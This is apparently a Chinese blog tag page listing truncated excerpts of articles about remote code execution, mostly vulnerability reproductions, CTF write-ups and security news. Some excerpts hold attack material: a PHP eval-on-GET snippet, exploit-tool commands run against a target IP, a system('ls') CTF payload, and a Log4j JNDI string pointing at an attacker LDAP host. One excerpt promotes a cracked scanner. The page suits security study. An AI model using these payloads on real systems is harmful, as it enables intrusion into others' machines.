首页 > TAG信息列表 > RCE

Tomcat文件包含漏洞到RCE剖析

该漏洞编号为CVE-2020-1938 目前影响版本: Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0.100 Apache Tomcat 6.x 本次漏洞复现到代码审计选用8.5.43为例 首先搭建好漏洞环境 可以在docker搭建vulhub或者直接下载tomcat源码进行搭建 因为

无参数rce

无参指的是所用的函数都不带参数   关键代码与下面类似 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['exp'])) { eval($_GET['exp']); }?> 这里学习了一些方式: 1、getallheaders() 构造payload:eval(imlode(getallheaders

漏洞复现-s2-008-RCE

0x00 实验环境 攻击机:Ubuntu 靶场:vulhub搭建的靶场环境   0x01 影响版本 影响版本:2.1.0 - 2.3.1 形成原因:devMode下支持直接执行OGNL表达式,Cookie 拦截器错误配置可造成 OGNL 表达式执行,生产环境一般不会存在该漏洞,但是开了debug模式就可以直接执行命令。   0x02 漏洞复现 直接

Activiti BPMN流程引擎使用不当导致的相关RCE问题

PS:首发自:https://moonsec.top/articles/82 说明 此篇文章主要记录Activiti流程引擎在使用过程中,使用不当会造成的相关问题以及RCE方法,此篇仅做安全研究用,无用相关的攻击,否则后果自负。 1.Activiti说明 1.1 概念 工作流。通过计算机对业务流程自动化执行管理,主要解决的是“使在多个

远程代码执行漏洞

远程代码执行(Remote Code Execute)(Remote Command Execute) RCE:可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,进而达到控制后台系统。 远程系统命令执行   一般出现这种漏洞,是因为应用系统从设计上需要给用户提供制定的远程命令操作的借口,比如常见见的路由器,防火墙,入

在Apache Cassandra数据库软件中报告高严重性RCE安全漏洞

研究人员披露了ApacheCassandra一个现已修补的高严重性安全漏洞的细节,如果这个漏洞得不到解决,可能会被滥用来获取受影响安装的远程代码执行(RCE)。 DevOps公司JFrog的安全研究员在周二发表的一篇技术文章中称:“Apach的这个安全漏洞很容易被利用,有可能对系统造成严重破坏,但幸运的

DolphinPHP RCE漏洞

DolphinPHP DolphinPHP(海豚PHP)是一个基于ThinkPHP5.1.41LTS开发的一套开源PHP快速开发框架,DolphinPHP秉承极简、极速、极致的开发理念,为开发集成了基于数据-角色的权限管理机制,集成多种灵活快速构建工具,可方便快速扩展的模块、插件、钩子、数据包。统一了模块、插件、钩子、数据

Spring Core RCE POC Application

Spring4Shell PoC Application This is a dockerized application that is vulnerable to the Spring4Shell vulnerability. Full Java source for the war is provided and modifiable, the war will get re-built whenever the docker image is built. There is nothing spe

学会辨识「漏洞炒作」你就比别人强!

点击关注强哥,查看更多精彩文章呀 哈喽,大家好,我是强哥。 昨天,最受欢迎的开源轻量级 Java 框架 Spring 被曝存在高危的 RCE(远程控制设备) 零日漏洞 ,北京大学计算中心、外媒 praetorian 、 bleepingcomputer 等站点对该漏洞进行了报道。 炒作 强哥也看到了很多媒体疯狂报道此事,根据网

ThinkPHP(2-rce)任意代码执行漏洞复现及原理

漏洞详情: 使用了危险函数:preg_replace的/e模式匹配路由: preg_replace 函数执行一个正则表达式的搜索和替换。 preg_replace ( mixed $pattern , mixed $replacement , mixed $subject  ) preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) $pattern: 要搜索的模式,可以是字符

网络安全/渗透测试工具AWVS14.7下载

0x01 AWVS更新介绍 AWVS14.7.220228146更新于2022年3月1日,此次更新更新.NET IAST传感器(AcuSensor)现在可以安装在Windows上的.NET Core v3和v5上(使用 Kestrel 服务器)等等。 注:附含Win/Linux/Mac安装包及破解说明 0x02 AWVS更新详情 新特性 .NET IAST传感器(AcuSensor)现在

MeterSphere PluginController Pre-auth RCE

  原文:https://xz.aliyun.com/t/10772   稍微了解了下,https://metersphere.io/   官网:MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、性能测试、 团队协作等功能,全面兼容 JMeter、Postman、Swagger 等开源、主流标准,有效助力开发和测试团队充分利用云弹性

Clash RCE 漏洞复现

一、介绍 clash for windows是一款非常好用的编程辅助代理工具,兼容性非常强,可以支持多平台、snell,vmess等等,满足不同用户之间的使用需求,大大提高用户的工作效率。软件还可以自定义界面颜色,主题设置,方便用户使用。 二、影响范围 Windows v0.19.9版本及以下 MAC OS版本未知 三、

向日葵RCE复现

1、影响版本 11.0.0.33162 2、存在漏洞主机:192.168.1.9   3、扫描是否存在RCE漏洞 存在,端口是51258 .\xrkRce.exe -h 192.168.1.9 -t scan   4、RCE利用 成功执行whoami、ipconfig命令 .\xrkRce.exe -h 192.168.1.9 -t rce -p 51258 -c "whoami"  .\xrkRce.exe -h 192.168.1.9

攻防世界之php_rce

题目:      ========================================================================== 解题思路: 1.这题主要考查ThinkPHP V5版本的RCE远程执行命令漏洞。上github搜一下 2.一个一个POC测试   3.执行到第三个是时候可以发现可以命令注入 火狐浏览器可以直接下个HackBar

marktext编辑器XSS触发RCE命令执行

marktext编辑器XSS触发RCE命令执行 遵纪守法 任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益 漏洞描述 marktext编辑器XSS触发RCE命令执行 风险等级 高危 影响版本 marktext目前所有版本均受影响

CTFHub技能书解题笔记-RCE-eval执行

打开题目 直接就是源码。 意思是传参cmd,然后直接就执行cmd,不做任何过滤。 然后我们直接传入命令,进行测试?cmd=system("ls"); 这里直接查询了当前目录。但是没有flag,我们尝试返回上一层。 /在这里做返回上一层,可叠加使用,/../../。 看到了flag_17023。 直接查看一下,这里没

Log4j2 RCE 简单复现

一:所以环境 java 1.8.0_u172+idea 注:高版本的java不行,最好是在java1.8.0_u140以前的版本复现。 二:复现过程 github上下载本次复现所需要的东西: 第一步 你需要知道你的IP地址,因为是本地复现,所以就是你本地的物理机IP,也可以是你服务器的IP地址,总之一定是自己的IP地址。你要是

XDebug 远程调试漏洞复现(代码执行)

环境搭建 启动docker systemctl start docker 进入对应目录 cd vulhub/php/xdebug-rce/ 启动容器 docker-compose up -d 查看容器 docker ps 访问8080端口(搭建成功) 在本机执行exp exp的位置在vulhub/php/xdebug-rce/目录下(成功执行) python3 exp.py -t http://10.106.8.91:808

CVE-2021-45232 Apache APISIX 从未授权访问到RCE

00x1漏洞环境 Apache APISIX Dashboard 2.7 - 2.10 版本受到影响 通过git拉取在docker搭建环境 git clone https://github.com/apache/apisix-docker   注意这里需要把yml文件改成2.7版本      然后用docker搭建就可以了     00x2 攻击过程   环境跑起来后成功访问到900

漏洞复现(三):Apache HTTP Server漏洞(CVE-2021-41773 - 目录穿越引起的文件读取与命令执行)

目录 漏洞简介 漏洞复现 一. Vulnerable file read config(易受攻击的文件读取配置) 环境搭建 漏洞利用 二、Vulnerable RCE config(易受攻击的 RCE 配置) 环境搭建  漏洞利用  漏洞修复 漏洞简介 该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目

CVE-2021-44228:Apache Log4j RCE

文章前言 本篇文章我们主要介绍关于CVE-2021-44228:Apache Log4j RCE漏洞的自检与修复,帮助甲方人员尽快修复项目中存在的不安全依赖 漏洞概述 Apache Log4j2是⼀个基于Java的⽇志记录⼯具,该⼯具重写了Log4j框架,并且引⼊了⼤量丰富的特性,该⽇志框架被⼤量⽤于业务系统开发,⽤来记

[01]剑指安全之巅:知识普及之浅谈模糊测试,深入安全漏洞挖掘方法

剑指安全之巅,探求安全之本 知柯信息安全&CSDN鸿渐之翼 作者:CSDN 网络安全领域博主 鸿渐之翼 知柯™️信息安全 您身边的网络安全专家,用心呵护您的安全! 原文链接: [01]剑指安全之巅:知识普及之浅谈模糊测试,深入安全漏洞挖掘方法 标题主流安全测试方法: 白盒测试、黑盒测试、灰盒测

log4j-rce复现

声明:没研究过Java漏洞,有错误的地方一定要告诉我!!原理我也没有继续跟。 01 分析 师傅带着理了一遍,思路清晰了。 一句话总结就是:让引用了log4j的漏洞类,然后把${jndi:ldap://hackserver/xxxxxx}当作参数传到log4j的log.error ,就会通过动态的远程加载我们精心构造的一个恶意类,恶意类编

log4j2 JNDI注入复现

复现现象: 这个镜像使用了log4j2用来当做靶机程序 1、拉取一个docker镜像 docker pull vulfocus/log4j2-rce-2021-12-09 2、跑起来docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 3、进入这个平台 https://log.xn–9tr.com/ 点击获取一个域名 4、执行一个pos